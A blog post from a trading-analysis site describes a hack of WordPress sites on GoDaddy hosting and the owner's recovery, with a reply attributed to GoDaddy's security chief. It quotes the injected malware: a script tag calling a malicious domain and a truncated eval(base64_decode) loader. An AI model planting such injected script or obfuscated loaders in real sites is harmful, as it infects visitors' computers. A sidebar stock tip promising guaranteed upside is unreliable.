Marketcalls

Simply Intelligent Technical Analysis and Trading Strategies

You are here: Home / Web Updates / Godaddy Sites got hacked… Uh I restored mine!

Godaddy Sites got hacked… Uh I restored mine!

by 2 Comments


There is an undetermined number of sites hosted at GoDaddy Server that have been attacked and exploited and unfortuanely Mine is one among them. The scenario is the same as a few months ago: Malware is injected into the .php files(WordPress) on the hosted sites, and the visitors of a site are getting redirected to a third website which injects a virus into the visitors’ computer. (GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber )

 
All the sites we’ve seen so far contain the following javascript added to all PHP files:

<script src="https://myblindstudioinfoonline.com/ll.php"

Which are generated by a very long eval(base64_decode line:

eval(base64_decode("aWYoZnVuY3Rpb....

Now i had restored all my webpages back to normal. Now I really hate those hackers!
Wasted more than 5 hours in recovery itself!

If you’re on GoDaddy Server & hosted WordPress  Website, a major malware infection is going around. Kindly check yours and get solved soon!

Related Readings and Observations

  • How my wordpress blog got attacked and restoredHow my wordpress blog got attacked and restored How my wordpresss blog got attached and restored an awesome journey to care about web security. If you are a wordpress blog owner then it is a must to focus on security.
  • Next GANN Support Comes near 4620Next GANN Support Comes near 4620   Nifty closed decisively below 5 EMA(Low) Weekly. Which indicates weekly sell signal as per 5EMA(High-Low) Principle. And from the shorter term GANN Charts next range of […]
  • Double Bottom Breakdown in Dow P&F ChartsDouble Bottom Breakdown in Dow P&F Charts   Charts shown here is a Traditional 3Box reversal P&F(Point & Figure Charts) of Dow. Currently there is a Double Bottom Bearish Breakdown Pattern in Dow on […]
  • .Net SDK for Amibroker.Net SDK for Amibroker .NET for AmiBroker is a 3rd party software package that provides full .NET programmability to AmiBroker..NET for AmiBroker covers all programmable features of AmiBroker: plug-in […]
  • Buy Patni Computers in Short Term : Patni Buy Back Shares @ Rs 325Buy Patni Computers in Short Term : Patni Buy Back Shares @ Rs 325 Script : Patni Computers CMP : Rs269 Target : Rs320 Reason : Patni Computers to Buy Back Shares Upside : 20% surely guarenteed   India-based Patni Computer Systems Ltd  posted […]
  • Dow Jones Trading above 200 day MADow Jones Trading above 200 day MA   Dow Jones finally Closed above 200 day MA after a struggle for long time. Source: www.marketcalls.in

Comments

  1. An exploit affected PHP files on approximately 150 Go Daddy accounts Friday afternoon. Go Daddy’s Security Team worked quickly to clean and restore these websites, however, we have detected additional customer sites that may currently be experiencing difficulties due to this same attack.

    Go Daddy’s Security Team has identified the cause. Our forensics have determined malicious files are being uploaded via FTP to customer websites. Go Daddy is asking all customers who believe they have a problem to change their FTP passwords.

    Meantime, our team is working swiftly to restore all affected websites and appreciates customer feedback. Go Daddy will continue to monitor as long as it takes to ensure our customer accounts are clean.

    If you suspect your site was impacted, please fill out our security submission form, located here -- http://www.godaddy.com/securityissue.

    Thank you,
    Todd Redfoot
    Go Daddy Chief Information Security Officer

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *